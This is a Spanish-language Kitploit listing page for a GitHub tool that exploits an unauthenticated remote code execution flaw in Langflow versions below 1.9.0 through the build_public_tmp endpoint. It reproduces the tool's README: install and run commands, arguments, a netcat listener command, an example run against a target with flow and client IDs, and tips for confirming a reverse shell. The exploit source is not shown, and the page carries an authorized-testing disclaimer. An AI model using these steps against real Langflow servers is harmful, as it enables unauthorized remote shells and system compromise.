Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-33017-Exploit — Exploit para ejecución remota de código no autenticada en Langflow <1.9.0 a través del endpoint build_public_tmp, que entrega una shell inversa para pruebas de penetración autorizadas. | Kitploit
Herramientas/GitHubGitHub/diamorphine666/cve-2026-33017-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubdiamorphine666/cve-2026-33017-exploit

CVE-2026-33017-Exploit

Exploit para ejecución remota de código no autenticada en Langflow <1.9.0 a través del endpoint build_public_tmp, que entrega una shell inversa para pruebas de penetración autorizadas.

Ver Repositorio
2hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Fireflow RCE Exploit

Ejecución remota de código para Langflow a través del endpoint build_public_tmp.
Explotación a través del endpoint público de construcción de flujo que ejecuta una reverse shell en el objetivo.

Requisitos

  • Python 3.8+
  • Biblioteca httpx

Instalación:

root@kitploit:~
pip install httpx

Uso

root@kitploit:~
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>

Argumentos

  • -u, --url : URL base de la instancia de Langflow (ej., https://flow.example.com/)
  • -l, --lhost : Tu dirección IP para recibir la reverse shell
  • -p, --lport : Puerto de escucha para la reverse shell
  • -f --flow-id : ID del flujo objetivo (requerido – obtener de /api/v1/flows/ o de la interfaz)
  • -c --client-id : Valor de la cookie client_id para identificación de sesión
  • Ejemplo

    1. Inicia un listener:

      root@kitploit:~
      nc -nlvp 9001
      
    2. Ejecuta el exploit:

      root@kitploit:~
      python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
      
    3. Si tiene éxito, obtienes un shell bash interactivo.

    Notas Importantes

    • ReadTimeout es normal – el servidor puede no responder porque el shell bloquea la solicitud HTTP. Mientras veas una conexión en tu listener, el exploit funcionó.
    • Se requiere un flow-id válido. Lista todos los flujos mediante GET /api/v1/flows o cópialo desde la URL del navegador.
    • Esta herramienta está destinada únicamente a pruebas de penetración autorizadas y fines educativos. No la utilices contra sistemas sin permiso explícito.

    Versiones Afectadas

    • Versiones de Langflow anteriores a la corrección para RCE de componentes personalizados <1.9.0

    Licencia

    MIT – para investigación de seguridad educativa y ética.

    Descargar herramienta